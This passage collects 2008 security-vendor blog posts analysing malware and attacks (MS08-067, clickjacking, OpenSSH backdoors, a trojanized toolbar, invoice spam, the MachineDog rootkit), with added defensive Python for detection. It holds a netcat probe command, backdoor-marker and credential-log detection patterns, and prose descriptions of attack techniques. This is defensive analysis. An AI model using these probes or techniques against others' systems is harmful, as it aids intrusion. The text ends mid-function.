Attacks seen in the wild so far seem to have come from variants of the Spy-Agent.da trojan. When run, it may not be immediately apparent to the victim that it is using any exploits. Taking a quick glimpse into the binary code of basesvc.dll (Spy-Agent.da.dll), one of the DLL components installed by Spy-Agent.da, one can see strings that will look very familiar to anyone who studied MS06-040.

MS08-067 strings

On closer analysis, Spy-Agent.da.dll seeks out potentially vulnerable Windows machines on the local network and sends maliciously crafted DCERPC requests to exploit the Server Service (SvrSvc).

MS08-067 exploit

When successful, hardcoded shellcode embedded within the malware is executed on the targeted machines to download Spy-Agent.da (or possibly other variants or files) from a web server hosted in Japan.

MS08-067 shellcode
(shellcode after decoding)

Just hours after the patch release, public exploit source code has already been seen circulating on the Internet. What more can I say? Patch your systems! Yes, NOW!

Spy-Agent.da and Spy-Agent.da.dll are now detected using the current 5414 DATs. See Dave’s blog for McAfee’s coverage.

(Thanks to Joey Koo and Xiaobo Chen for providing the analysis data and packet dumps used in this blog.)

McAfee Coverage of the Microsoft Emergency Release

Due to the MS08-067 out-of-cycle release from Microsoft today we are in the process of releasing emergency DATs/coverage updates for many of our products and technologies. We are also working on an emergency Security Advisory as well.

Current state for each of the content areas is as follows:

Malware - Emergency DAT cut and testing in progress. ETA of 2 - 3 hours.

HIPS - Generic buffer overflow should provide coverage.

Intrushield - Partial existing coverage. Additional emergency sigset releasing today.

Foundstone - Emergency signatures being released today.

V-Flash - Emergency signatures being released today.

MNAC - Emergency signatures being released today.

VirusScan Enterprise BOP - Should provide coverage for the buffer overflow.

We will continue to monitor this critical event to provide the most comprehensive coverage we can.

Clickjacking

[This entry was updated on November 3.]

Lately, the topic of “clickjacking” has gained popularity in discussions on the Internet. It is a new type of web attack, and I decided to find out what it’s all about.

I found an online video from OWASP NYC AppSec 2008 here. In the video, Jeremiah Grossman and Robert “RSnake” Hansen reported this new vulnerability in a presentation titled “New Zero-Day Browser Exploits - ClickJacking.” I also found a demo of this attack here.

In the videos they describe only parts of the vulnerability, but we can learn enough to gain a basic idea of what clickjacking is.

To explain, I’ll use an example. You have a web page A controlled by an attacker. A contains an IFRAME element B. In a clickjacking attack, B is made transparent and the z-index property of its layer is set higher than that of the other elements of page A via cross-site scripting. The area of B also needs to be big enough that the user can easily click its content. The attacker places a button in B that leads to whatever action he wants. Then the attacker places some buttons on page A that will attract users. The location of the buttons in B must match the buttons in A, so when users appear to click a button on page A, they are actually clicking the button in B, because the z-index of B’s buttons is higher than that of A’s buttons. This attack uses DHTML and does not require JavaScript, so disabling JavaScript will not help.

This vulnerability affects multiple web browsers. Unfortunately, no patch for it is currently available, so users should be careful. The vulnerability has also been found to affect Adobe Flash Player, the most popular rich-media Internet application today. Adobe has released a security advisory and provided a workaround.
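Browsers and web servers later gained a direct defence against this attack: a response header that tells the browser whether the page may be placed in a frame at all (X-Frame-Options, introduced after this post was written, and later the Content-Security-Policy frame-ancestors directive, which takes precedence over X-Frame-Options when both are present). The following added example, not from the post, audits a response’s headers for that protection; the header sets are constructed, and the hostname parent.example is a placeholder.

```python
def _header_values(headers, name):
    """All values of one header (case-insensitive name), split on commas so
    that repeated or comma-joined headers are visible individually."""
    out = []
    for key, value in headers:
        if key.lower() == name.lower():
            out.extend(part.strip() for part in value.split(",") if part.strip())
    return out


def _csp_frame_ancestors(headers):
    """Source list of the first frame-ancestors directive, or None if absent.
    CSP directives are ';'-separated, so the value is not split on commas."""
    for key, value in headers:
        if key.lower() != "content-security-policy":
            continue
        for directive in value.split(";"):
            parts = directive.split()
            if parts and parts[0].lower() == "frame-ancestors":
                return parts[1:]          # empty list means 'none' per CSP
    return None


def framing_policy(headers):
    """Classify a response's framing protection.
    headers: list of (name, value) pairs as received, duplicates included.
    Returns 'deny', 'sameorigin', 'restricted', 'unprotected' or 'ambiguous'."""
    ancestors = _csp_frame_ancestors(headers)
    if ancestors is not None:
        sources = {s.lower() for s in ancestors}
        if not sources or sources == {"'none'"}:
            return "deny"
        if sources == {"'self'"}:
            return "sameorigin"
        if "*" in sources:
            return "unprotected"
        return "restricted"               # framing limited to listed origins
    xfo = [v.upper() for v in _header_values(headers, "X-Frame-Options")]
    if not xfo:
        return "unprotected"              # the situation the post describes
    if len(set(xfo)) > 1:
        return "ambiguous"                # conflicting values: fix the response
    value = xfo[0]
    if value == "DENY":
        return "deny"
    if value == "SAMEORIGIN":
        return "sameorigin"
    if value.startswith("ALLOW-FROM"):
        return "restricted"               # legacy form, not honoured everywhere
    return "ambiguous"                    # unknown token, treated as a finding


# Constructed header sets for a page that holds a one-click action.
VULNERABLE = [("Content-Type", "text/html"),
              ("Set-Cookie", "session=abc123; HttpOnly")]
HARDENED = [("Content-Type", "text/html"),
            ("X-Frame-Options", "DENY"),
            ("Content-Security-Policy", "default-src 'self'; frame-ancestors 'none'")]

if __name__ == "__main__":
    for label, hdrs in (("vulnerable", VULNERABLE), ("hardened", HARDENED)):
        print(f"{label}: {framing_policy(hdrs)}")
```

A result of "unprotected" on a page that performs an action on a single click is exactly the precondition for the attack described above; "ambiguous" is worth a finding too, since it means the server is sending contradictory instructions and the outcome depends on the browser.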

We will continue to watch for new information about this vulnerability.

McAfee Security Journal Released!

Issue 5 of the publication formerly known as Sage has been released. This issue we take aim and tackle the rather murky subject of social engineering. We have nine excellent articles for you from some of our finest researchers as well as two academic experts. Some of the topics covered include:

  • The Origins of Social Engineering
  • Social Engineering 2.0 - What’s Next?
  • Vulnerabilities in the Equities Markets
  • The Future of Social Networking Sites
  • Typosquatting - Unintended Adventures in Browsing

Many aspects of social engineering are dissected and investigated as well, some not found anywhere else! Definitely worth the download and read.

Available here.

Artemis Backstage #1: Malware Mapping

News about the Artemis project has been out for a little while. As the rollout continues we want to post some of the juicy backstage gossip here, making you some of the first people to see this outside of the core project team!

If you’ve not heard about the Artemis technology yet, it’s our “in-the-cloud”-based malware detection; head over to the McAfee Artemis micro-site. I highly recommend the podcast (hidden on the right-hand side) as my colleague Dimitry Gryaznov outtalks our communications guru Dave Marcus. ;)

One of the things Artemis provides to researchers is very clear telemetry on active malware campaigns, and I want to share a few interesting examples. All the “measles maps” below show a one-day period and were all taken at the same time earlier today.

First up is today’s typical ecard malware:

Map

As you might expect, there are lots of hits all around the globe, sent very quickly. [Take note, ISPs: you’re the first line of defense and you delivered this to our users.]

This is a previous ecard campaign from a week ago:

Map

(There’s always one.) This isn’t saying that the campaign is over and protection is no longer required. Since Artemis gets queries only for those without current detection in the DATs, this simply means that the map shows endpoint(s) that need to update.

Sex (still) sells. The current “tits.exe” campaign:

Map

This picture looked like the first one on Friday. Protection is relatively new for this threat and we’re seeing the queries tail off as customers update. This is exactly the point of Artemis, providing protection for new threats between updates, and efficiently, too. (I’ve no idea why this one appears to be more popular in Australia.)

This is the current data from the “tits.exe” campaign from last weekend (21 September):

Map

Yes it’s a blank map. In fact, the last query was at 00:45 on 25 September from an ISP in California. This is quite a revelation: Artemis fills a gap far wider than I first envisaged.

Dimitry’s podcast also explains how we are able to deploy Artemis without an upgrade and that Artemis has been dormant in the DATs for quite a few months already. Those on the Artemis-enabled beta programs have been enjoying its added protection for months as well.

A quick note about privacy before the vultures circle. ;) The dots on the map roughly represent ISPs rather than individual users (we couldn’t read it otherwise). We use the data purely on a statistical basis and we don’t keep it longer than we need to. The dots are geolocated by a service that has well-understood accuracy “limits,” so relax. Artemis does not know where you live, or what color the car on your driveway is. For that, you need to ask Google; they have pictures of it. ;) Artemis queries are short checksums or fingerprints. Those wishing to disable Artemis should unplug themselves from the Internet at this point. It’s far easier to track our blog readers, for instance. :-P

Some other trivia about Artemis:

  • Queries are not sent for every file, just the suspicious ones.
  • It will probably be invisible in the consumer products. (It’s a special driver.)
  • A query and its response are around 340 bytes.
  • It’s checksum/fingerprint independent, too.
  • Actionable responses are cryptographically strong.
  • Telemetry can be used to prioritize sample processing.
  • Today Artemis should gain about 1.5 million new users.

Enterprise customers, please feel free to call Platinum Support if you want to test out Artemis early.

Lastly, any malware authors who want free third-party real-time telemetry on their campaigns should contact us ASAP! Our legal hounds are waiting to take your calls.

Porn for Free: Puper Promises Hot Videos on YouTube

YouTube is an excellent resource for video sharing: Users can upload, view, and share video clips. It’s also not novel to find a legitimate web site being used as a vector to spread porn-spewing malware. We blogged earlier about fake video embedded in blogspot domains and attackers capitalizing on sensational news hitting the media. This time attackers are promising free adult video on YouTube to assault unsuspecting users.

Attackers are using fake profiles that contain a video link to YouTube to kick-start an infection. This profile contains a link pointing to:

http://superelection[blocked].info

The preceding web site is infamous for various U.S.-election-related spam and hosts a cocktail of exploits that attempt a drive-by installation on the victim’s machine. The site also attempts to social engineer the victim by promoting a fake codec that installs the Puper Trojan. We have identified multiple profiles connecting to various exploit-serving sites hosting the fake codec. The attackers have been successful in promoting this attack by posting the YouTube links to various forums. With numerous visits to this YouTube link so far, the chances are good that a number of users have fallen victim to this attack.

We advise all Internet users to follow safe browsing practices and keep their systems patched. Meanwhile we at McAfee Avert Labs will continue to protect our customers against such attacks.

The Continuing Saga of OpenSSH Attacks–Now With Backdoors

In a recent email to the Full-Disclosure mailing list there’s an interesting article that grabbed our attention. This email talks about how a hacking team claims to have compromised some Linux-based computers and have successfully installed OpenSSH backdoors.

It’s evident that the attackers probably obtained root access through an SSH password brute-force attack, leveraging the infamous Debian OpenSSL Package Random Number Generator Weakness (CVE-2008-0166). According to the email, once the OpenSSH backdoor is installed it records all user accounts, passwords, and IP addresses connecting to and from the host. Combined with social engineering tricks, the attackers can therefore gather sensitive system information about even more hosts that connect to the compromised machine. At the end of the report the team also lists some of its achievements, including information on compromised computers.

We have some suggestions for administrators to verify whether they’ve been compromised:

– First compare your devices to check whether any of these are in the records. Note: This list might not be exhaustive; thus even if your host is not present, we recommend you continue to the following steps.

– Use one of these commands to determine whether SSHD on the host has been replaced:

echo netdump | nc localhost 22
   or
echo netdomp | nc localhost 22

It should output the following information if the backdoor has been installed:

SSH-2.0-OpenSSH_4.3
netdump
SSH2_OUT: 127.0.0.1 user: root pass: password (localhost)

– By using a command such as “strings /pathto/sshd | grep netdump” you can verify whether the backdoor is currently installed and working.

– And of course, the most effective method is to have all the latest patches installed. If the system is a Debian flavor, you should definitely confirm that the OpenSSL Weakness (CVE-2008-0166) patch has been installed.

– We also suggest the use of public-key-based authentication rather than just a password-authentication mechanism.
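The banner probe and the strings check above can be wrapped into one script that an administrator runs against their own host. This is an added example for this archive, not code from the Full-Disclosure post or from OpenSSH; the two transcripts are constructed from the output shown above (the backdoor case) and from how a clean OpenSSH rejects a non-SSH identification string (the clean case), and the /usr/sbin/sshd path in the demo is an assumption.

```python
import re
import socket

# Marker the backdoored sshd described above responds to and echoes back.
BACKDOOR_MARKER = "netdump"

# Constructed transcripts of what `echo netdump | nc localhost 22` returns.
# A clean OpenSSH sends its banner and then rejects the bogus client
# identification string; the backdoor echoes the marker and its credential log.
CLEAN_SAMPLE = "SSH-2.0-OpenSSH_4.3\r\nProtocol mismatch.\r\n"
BACKDOOR_SAMPLE = (
    "SSH-2.0-OpenSSH_4.3\n"
    "netdump\n"
    "SSH2_OUT: 127.0.0.1 user: root pass: password (localhost)\n"
)

# The credential log line format quoted above: "user: <name> pass: <secret>".
CRED_LINE = re.compile(r"user:\s*\S+\s+pass:")


def classify_banner_response(response: str) -> str:
    """Classify a raw server response to the probe word."""
    lines = response.splitlines()
    if not lines or not lines[0].startswith("SSH-"):
        return "no-ssh-banner"
    body = "\n".join(lines[1:])
    if BACKDOOR_MARKER in body or CRED_LINE.search(body):
        return "backdoor-signature"
    return "clean"


def probe_sshd(host="127.0.0.1", port=22, probe=BACKDOOR_MARKER, timeout=3.0) -> str:
    """Live equivalent of `echo netdump | nc localhost 22` for checking your own host."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(probe.encode() + b"\n")
        chunks = []
        try:
            while True:
                data = s.recv(4096)
                if not data:
                    break
                chunks.append(data)
        except socket.timeout:
            pass
    return b"".join(chunks).decode("utf-8", errors="replace")


def bytes_contain_marker(data: bytes, marker: str = BACKDOOR_MARKER) -> bool:
    """Equivalent of `strings sshd | grep netdump`, applied to the binary's bytes."""
    return marker.encode() in data


def binary_contains_marker(path: str, marker: str = BACKDOOR_MARKER) -> bool:
    with open(path, "rb") as f:
        return bytes_contain_marker(f.read(), marker)


if __name__ == "__main__":
    # Assumed path; adjust to where sshd lives on your distribution.
    print("local sshd banner check:", classify_banner_response(probe_sshd()))
    print("marker in /usr/sbin/sshd:", binary_contains_marker("/usr/sbin/sshd"))
```

A clean result from both checks is not proof of a clean host (a different backdoor would use a different marker), which is why the package-integrity and patching advice in the remaining steps still applies.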

We’ll continue to monitor this threat and will update you with more information as it becomes available.

Virtual worlds, real attacks

When I see my son playing online computer games I am worried!

I am worried not because he spends too much time in front of a computer - it is the abundance of security issues that surround contemporary online gaming that makes me uneasy. I just had to do something about that.

So what I have tried to do is list the security problems related to online games and humbly suggest some possible solutions. The result is a research white paper that has just been posted on our Web site:

 http://www.mcafee.com/us/local_content/white_papers/threat_center/wp_online_gaming.pdf.

If you are interested in topics like game-related money-laundering, virtual terrorist attacks, stolen virtual identities, game-related malware, virtual viral outbreaks - I dare you NOT to click the link! :-)

The growth of computer attacks that steal user data is disturbing. The graph below shows this alarming trend. What is probably not commonly known is that approximately 40-50% of these attacks specifically target online gamers!

Growth of Password Stealing Trojans

A recent story about gaming malware that infiltrated the International Space Station is a good indication of how serious the problem actually is.

I do believe that most attacks on virtual life can be rendered impossible or uneconomical. Equipped with our current knowledge in security there are no good reasons why our children and their virtual avatars should suffer inside the games from spam, phishing, adware, spyware, Trojans, viruses, worms, and other malware— all those bugbears that currently plague our real day-to-day lives.

Localized 0-day Once Again: Exploit-TaroDrop.e

One of the issues that we’ve been highlighting at our recent conference presentations and blogs was the emergence of major localized threats around Asia. McAfee Avert Labs discovered yet another unidentified vulnerability in the Japanese word processor Ichitaro last Friday.

This Japanese application has been a target of attacks for several years, and several 0-day vulnerabilities in it were discovered and exploited in the past. Besides Ichitaro, other popular localized applications are often targeted by 0-day exploits. We also frequently observe exploits targeting vulnerabilities months after the vendor has already patched them.

Users should continue to stay vigilant about suspicious email attachments and not open unknown files. Be sure to update your applications, popular or not, with the latest security patches to protect you and your organization from known attacks.

These newly crafted malicious documents are detected as Exploit-TaroDrop.e trojan, and the payload as BackDoor-DRZ trojan in the 5368 DATs.

The vendor has acknowledged the vulnerability and will be posting a patch.

More Than a Toolbar

We received a sample recently from a customer. Its file name, ToolbarSetup.exe, implies it may be a toolbar installer. Upon execution, it displays the eBay toolbar EULA and the installation interface. And this program does indeed install the eBay toolbar.

However, something grabbed my attention during the installation. Besides the 2ebaytoolbarsetup.exe process, the program also created the wscript.exe process and ran .vbs files–that is not common for the toolbar installation. So I looked into every file dropped by the installer. Then something caught my eye. Besides the dozens of legit eBay toolbar components, there was a file named startup.exe. Unlike the toolbar components, this file had no version information. So I ran it in my test environment, and it generated a few batch and Visual Basic script files. The image below shows one of the generated .vbs files.

This file silently opens TCP port 3389, which is by default the port for Terminal Services. It creates a new account–”eBayMember”–with Administrator privileges and enables this account to remotely access the infected machine. The created account is also hidden from the login screen, to prevent the victim from noticing.

Then the remote access ability of the compromised machine was verified by using the user name and password defined in the malicious .vbs file, as illustrated below. A successful login suggests the infected machine could be completely controlled by a remote attacker.
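From the defender's side, the sequence described above (a script host creating an account and then granting it Administrator rights moments later) is exactly the kind of event pair a log correlation rule can catch. The following Python is an added example, not McAfee code: the records are constructed and simplified, modelled on Windows Security events 4720 (a user account was created) and 4732 (a member was added to a security-enabled local group). The flat field layout and the "actor" field naming the process behind the action are this example's own assumptions, not the real event schema.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed, simplified event records (see lead-in for assumptions).
# Host WS01 shows the pattern from the toolbar dropper; WS02 is a normal
# helpdesk action a day apart and should not alert.
SAMPLE_EVENTS = [
    {"time": "2008-08-01 10:00:01", "id": 4720, "host": "WS01",
     "target": "eBayMember", "actor": "wscript.exe"},
    {"time": "2008-08-01 10:00:03", "id": 4732, "host": "WS01",
     "target": "eBayMember", "group": "Administrators", "actor": "wscript.exe"},
    {"time": "2008-08-01 11:30:00", "id": 4720, "host": "WS02",
     "target": "jdoe", "actor": "mmc.exe"},
    {"time": "2008-08-02 09:00:00", "id": 4732, "host": "WS02",
     "target": "jdoe", "group": "Remote Desktop Users", "actor": "mmc.exe"},
]

# Script hosts: an installer has no business creating administrators via these.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "cmd.exe"}
TIME_FMT = "%Y-%m-%d %H:%M:%S"


def find_suspicious_account_creations(events, window=timedelta(minutes=5)):
    """Alert when an account is created and then added to Administrators
    within `window` on the same host; raise severity if a script host did it."""
    by_account = defaultdict(list)
    for e in events:
        by_account[(e["host"], e["target"])].append(e)

    alerts = []
    for (host, account), evs in by_account.items():
        created = [e for e in evs if e["id"] == 4720]
        admin_adds = [e for e in evs
                      if e["id"] == 4732 and e.get("group") == "Administrators"]
        for c in created:
            t0 = datetime.strptime(c["time"], TIME_FMT)
            for a in admin_adds:
                delta = datetime.strptime(a["time"], TIME_FMT) - t0
                if timedelta(0) <= delta <= window:
                    severity = "high" if c.get("actor") in SCRIPT_HOSTS else "medium"
                    alerts.append({"host": host, "account": account,
                                   "seconds": int(delta.total_seconds()),
                                   "severity": severity})
    return alerts
```

Pairing the two events per (host, account) keeps the rule robust against ordinary administration, where the group change usually happens in a separate session; the script-host check is what separates this dropper's behaviour from a helpdesk action.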

Still feel safe downloading and installing toolbars from untrusted sources? Attackers can take advantage.

J2ME Security Vulnerabilities Discovered

An independent security research firm has announced several new mobile Java (J2ME) security vulnerabilities. Two of the vulnerabilities affect the Java virtual machine (JVM) on mobile phones, and the other 14 are specific to Nokia Series 40 phones. Series 40 mobiles are not Symbian smartphones and run only J2ME MIDlets.

The reported vulnerabilities and exploits in the JVM could allow the running of untrusted Java MIDlets. Once those are used, relatively recent phones running S40 3rd Edition are open to malicious MIDlets that exploit the other vulnerabilities.

According to the researchers the vulnerabilities allow:

  • gaining additional privileges for a malicious MIDlet, even manufacturer or mobile carrier level
  • running a malicious MIDlet when the phone is first turned on
  • accessing files
  • sending SMS/MMS
  • making phone calls
  • reading your contacts
  • accessing the SIM card
  • eavesdropping using the camera and microphone

Java phones used to be affected by malware such as J2ME/Redbrowser or J2ME/Wesber, which caused just premium-rate charges. This is the first time that such phones have been vulnerable to more malicious malware.

The security research company has produced a report of more than 170 pages on the vulnerabilities and a number of proof-of-concept (PoC) exploits. Usually when researchers develop PoC code or malicious samples, they provide them directly to the security research community. In this case, the researchers are asking for €20,000 (about $30,000) for early access to the research and malware. After the release of vulnerability information, attackers will generally attempt to write exploits.

A parallel Olympics for malware started today


(Photos are taken from the slideshow attached to the Trojan)

With all the press coverage the Beijing Olympics are currently receiving, it doesn’t surprise us that malware authors are using them as a way of spreading their parasites. Today, around the time of the opening ceremony, we received a sample in the Aylesbury research lab which claimed to be a set of images showing the amazing architectural feats of the venues.

While viewing the slideshow your machine would be infected by a classic BackDoor-CKB. The original dropper, an executable that tries to imitate a PowerPoint presentation icon, copies 81.dll and wuauct.exe and launches a PowerPoint slideshow to disguise its background activity. The server which the backdoor communicates with appears to be located in the city of Henan (in the region of Shanxi, China).

We want to reiterate to all our readers to be vigilant and cautious while checking emails that attempt to attract attention to high-profile events. If you do receive any suspicious emails, please find details on how to submit a sample here. We wish all your countries the best of luck in the competition :D

What Is Undetectable Malware?

OMG, undetectable Trojans are coming to get us! At least that’s what a story in The Register says, referring to Limbo 2.

Or else we’ve just found further evidence of the “AV software is for catching unknown threats” myth.

Malware authors selling “guaranteed undetected” Trojans is not news; it’s been happening since developing Trojans was first motivated by money. The Trojan authors test their creations against freely available AV scanners, and if it’s undetected at that moment, it qualifies as “undetected.” However, that doesn’t mean that they will always remain undetected. Or that another type of security product won’t detect it, such as a firewall or network intrusion prevention system.

One amusing example of malware for sale included an end-user license agreement that promised violators would be reported to AV companies so your botnet could be dismantled.

But I digress. :)

The point is that “undetectable Trojans” implies that some novel method of storing the malware code on the system is being employed, such that security software (and likewise the operating system) is incapable of seeing it. Limbo 2 does no such thing. It’s a simple PWS-Banker Trojan as far as security software is concerned. I find it disappointing that a security company would describe it otherwise–that smacks of FUD to me.

In other news, this will be my last post for the Avert Labs blog. As of next week, I’ll be the Director of Research for West Coast Labs. Thank you all for reading and commenting on my posts throughout the years. Hearing your opinions has been the most entertaining part of being a blogger!

Invoice Spam Takes Flight

Last night we blogged about fake invoice spam carrying malware.  Unsurprisingly those behind the recent attacks continued today with new spam campaigns involving airline ticket invoices.  Messages may appear as follows (other spam campaigns may appear different):

—————————–
From:
 [name] [airline_name] Airlines
Subject: Your order from {airlines} [number]
   or
Subject: Online order for flight ticket [number]
Body:

Hello,
Thank you for using our new service “Buy airplane ticket Online” on our website.
Your account has been created:

Your login: [characters]
Your password: [characters]

Your credit card has been charged for $[number in the $400 range]
We would like to remind you that whenever you order tickets on our website you get a discount of 10%!
Attached to this message is the purchase Invoice and the flight ticket.
To use your ticket, simply print it on a color printed, and you are set to take off for the journey!

Kind regards,
[name]
[airline]

Attachment: E-ticket_[number].zip (containing an executable, which may have a Word document icon).
—————————–

As with previous campaigns, the executable is a new variant of Spy-Agent.bw.  Once again, Avert Labs reminds readers to practice safe computing, and never to open unexpected email attachments, or follow unexpected URLs; especially from unfamiliar senders.

Fake Invoice Spam Carries Malware

On July 15, we sent out a Security Advisory including Generic Downloader.ab (MTIS08-131-A).  This covered a Trojan variant that was mass spammed, purporting to be a UPS invoice.  Since then we’ve seen a number of subsequent mass spammings carrying new variants of Spy-Agent.bw. The email message content is similar to the original spam:

———————————-
From: “United Parcel Service”
Subject: [RE] UPS Tracking Number [number]
Body:

Unfortunately we were not able to deliver postal package you sent on July the 1st in time because the recipient’s address is not correct.
Please print out the invoice copy attached and collect the package at our office

Your UPS

Attachment: UPS_INVOICE_[number].zip or invoice_[number].zip
———————————-

Over the past 24 hours we’ve seen other spam runs from “Customs Service” with the attachment “Tax_invoice.zip” as well as “Bill_Tax.zip” attachments from “US Customs Service” and “Rechnung.zip” from “WG: Lastschrift [number]”.  The zip attachments contain .EXE files.  In order for infection to occur users must open the attached ZIP and then choose to run the executables manually.

Product coverage is being updated for new malware variants as necessary and a follow-up security advisory will be sent soon.

These spam runs may continue over the next few days.  Avert Labs reminds readers to practice safe computing, and never to open unexpected email attachments, or follow unexpected URLs; especially from unfamiliar senders.
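Both invoice campaigns above share one mechanical trait: a ZIP attachment holding an executable that is dressed up as a document (a document icon, a document-like name). A mail gateway does not need the icon to spot this; the first bytes of the member and its name are enough. The following Python is an added example for this archive, not McAfee product code: the attachment it inspects is constructed in memory with a reserved-looking name, and the extension lists are this example's own choices.

```python
import io
import zipfile

EXECUTABLE_EXTS = {".exe", ".scr", ".com", ".pif", ".bat", ".cmd", ".vbs", ".js"}
DOCUMENT_EXTS = {".doc", ".pdf", ".txt", ".rtf", ".xls"}


def build_sample_attachment(name: str = "E-ticket_48213.doc.exe") -> bytes:
    """Constructed look-alike of the spammed attachment: a zip holding a member
    whose content starts with the PE 'MZ' signature under the given name,
    beside a harmless text file. Nothing here is a real sample."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr(name, b"MZ" + b"\x90" * 64)
        z.writestr("readme.txt", b"Thank you for your order.\n")
    return buf.getvalue()


def inspect_attachment(blob: bytes) -> list:
    """Return (member name, reasons) for every zip member that looks like a
    disguised executable. Content is judged by its first bytes, not only by
    its name, so renaming the file does not help the sender."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(blob)) as z:
        for info in z.infolist():
            if info.is_dir():
                continue
            lower = info.filename.lower()
            stem, _, ext = lower.rpartition(".")
            inner_ext = "." + stem.rpartition(".")[2] if "." in stem else ""
            with z.open(info) as member:
                head = member.read(2)
            reasons = []
            if "." + ext in EXECUTABLE_EXTS:
                reasons.append("executable-extension")
                if inner_ext in DOCUMENT_EXTS:
                    reasons.append("double-extension")
            if head == b"MZ":
                reasons.append("pe-header")
                if "." + ext not in EXECUTABLE_EXTS:
                    reasons.append("pe-with-non-executable-name")
            if reasons:
                findings.append((info.filename, reasons))
    return findings
```

The "pe-with-non-executable-name" reason is the one that matters most at a gateway: it fires when a sender renames the executable to something that a name-based filter would pass.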

Do you know cloaking?

Last week, a friend working at the French CERT-IST alerted me to some web sites that did not display the same content when reached directly as when reached via a Google search, even though the visible URL was the same. Let me explain…..

In the first case, we arrive at the normal (or official) page, but when the site is reached via a Google search, we arrive at a false blog page proposing alternative and even malicious choices and links. This technique is commonly called cloaking. Its goal is to modify the content of a web page depending on visitor parameters or browser history.

Let me first give you an example. Using IE, I enter an attacked URL in the address bar and directly reach the site:

Using Google, I search for the same site:

I then follow the link and…. Surprise! I arrive at a fake blog page named after the site I searched for; it is not the expected page but a rogue advertising page.

If I wait on the page for a few minutes without following any of the proposed links, the normal web page is displayed in place of the fake one. But if I choose any of these links, I am taken to some very suspicious advertising sites.

To achieve this deception, the main page contains a mere instruction line that launches a malicious javascript, with a long unescape sequence.

When decoded (today, for this job, I used the facilities offered at
http://scriptasylum.com/tutorials/encdec/encode-decode.html), I discovered the link to the other “recipes” of this attack in an obscure subdirectory.
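The decoding step described here (turning a long unescape sequence back into readable JavaScript and pulling the hidden subdirectory link out of it) is easy to script offline instead of pasting into a web form. The following Python is an added example for this archive, not the author's tooling and not the real payload: the escaped string is constructed and decodes to a script tag pointing at a reserved example host.

```python
import re

# Constructed, harmless stand-in for the escaped document.write line found on
# the cloaked page: it decodes to a script tag pointing into a hidden
# subdirectory on a reserved example host.
SAMPLE_ESCAPED = (
    "document.write(unescape('%3Cscript%20src%3D%22http%3A%2F%2Fexample.invalid"
    "%2Fimages%2F.cache%2Fad.js%22%3E%3C%2Fscript%3E%u0020'))"
)

ESCAPE_RE = re.compile(r"%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})")
UNESCAPE_ARG_RE = re.compile(r"unescape\(\s*['\"]([^'\"]*)['\"]\s*\)")
URL_RE = re.compile(r"https?://[^\s\"'<>]+")


def js_unescape(s: str) -> str:
    """Decode JavaScript unescape() encoding: %XX and %uXXXX sequences.
    Malformed sequences are left as they are, as the browser leaves them."""
    def repl(m):
        code = m.group(1) or m.group(2)
        return chr(int(code, 16))
    return ESCAPE_RE.sub(repl, s)


def extract_unescape_args(script: str) -> list:
    """Pull out the string literals handed to unescape(...)."""
    return UNESCAPE_ARG_RE.findall(script)


def decode_and_extract(script: str) -> dict:
    """Decode every unescape() argument and list the URLs it reveals, which is
    what an analyst needs in order to locate the rest of the attack's files."""
    decoded = [js_unescape(arg) for arg in extract_unescape_args(script)]
    urls = [u for d in decoded for u in URL_RE.findall(d)]
    return {"decoded": decoded, "urls": urls}
```

Real pages often nest several layers (an unescape whose output is itself another escaped document.write), so in practice the decoder is run repeatedly on its own output until no unescape() call remains.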

Using Google, I found that this file architecture was not unique. Today more than 80 sites are affected by this attack; luckily, these malicious files are detected by McAfee as Exploit-PHPBB.b.

It seems this attack benefits people being paid through “pay per click” and/or people behind some rogue software like fake anti-viruses or naughty encounters. For sure, it is a profitable business!!

As early as 2006 the IP addresses revealed by Fiddler were flagged as suspicious. Two years later, they are still alive and still hosted at Global Net Access, LLC and ISPrime Inc, two American companies.

Various URLs visible in the Fiddler web session contain affiliate IDs. Calls to findwhat.com make one think that the MIVA pay-per-click search engine company is the one involved in this story. As each new page loads, this server records the affiliate ID. This makes it possible for the affiliate to get paid for each click. Consequently, it should be easy to unmask him!

At this point we can say that nobody seems in a hurry to stop this cloaking party. It looks like many people do well out of it! 

Are Internet cafes and bars in danger?

Recently, a piece of malware named MachineDog attracted attention within the Chinese security community. The malware itself appears to be a well-designed, tiny rootkit, and is quite different from other malware. One special characteristic is that it is designed to penetrate the hard-disk protection software as well as the security software installed in most Internet bars and cafés. This means it can infect most machines in many Internet bars and cafés, in some cases without much resistance.

The malware is composed of a user-mode application part and a kernel driver part. The application part does limited work: extracting the driver, installing it as a service, and then communicating with the driver through I/O control calls. The earlier version of the application part performed the infection itself by sending IRPs to the lower disk driver device (\Device\Harddisk\DR0) to locate and write userinit.exe directly on the hard disk. In later versions the infection work was improved and moved into the driver itself, leaving the application part tiny and simple.

The driver does the most important work: the infection that was earlier implemented in the application part. Its infection method is quite special and interesting, and can bypass many hard-disk protection products and some security software. First it reads the atapi.sys driver file from the hard disk and searches that driver’s body for the dispatch routine addresses, so that it can bypass any existing dispatch routine that has been inline-hooked. Why choose atapi.sys? Because the device created by atapi.sys is the last device in every device stack the IRP passes through; it is the end of the IRP’s path. Sending IRPs to this device avoids all the filter devices and inline hooks in any upper device that security or protection software relies on. The malware then sends IRPs to the partition device dispatch routines in the atapi driver to read and write data directly on the hard disk. It first reads data to locate the sector in which userinit.exe resides, so it knows where to infect; it then writes the injected code to the hard disk the same way and at that point modifies userinit.exe. Finally, it removes the inline hooks on the atapi devices, if they have been inline-hooked, until it receives the close command from the application part.

Most internet bars and cafes rely on hard disk protection software excessively, and mistakenly believe these types of software can replace security software. Once their machines are infected, the administrator just restores from backups made by the protection software. This malware takes advantage of this contrived neglect. The attack is so dangerous that once it successfully loads its driver into the kernel, most hard disk protection software will be nothing but an empty shuck, with the administrator still having no idea!!!
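Because the rootkit patches userinit.exe on disk, the mitigation that does not depend on the (bypassed) protection software is a known-good hash baseline of critical system files, verified from a clean boot medium where the live kernel cannot lie about what is read. The following Python is an added example, not McAfee or MachineDog code: it baselines and re-verifies a constructed stand-in for userinit.exe in a temporary directory and simulates the in-place patch to show the check firing.

```python
import hashlib
import os
import tempfile


def sha256_file(path: str) -> str:
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
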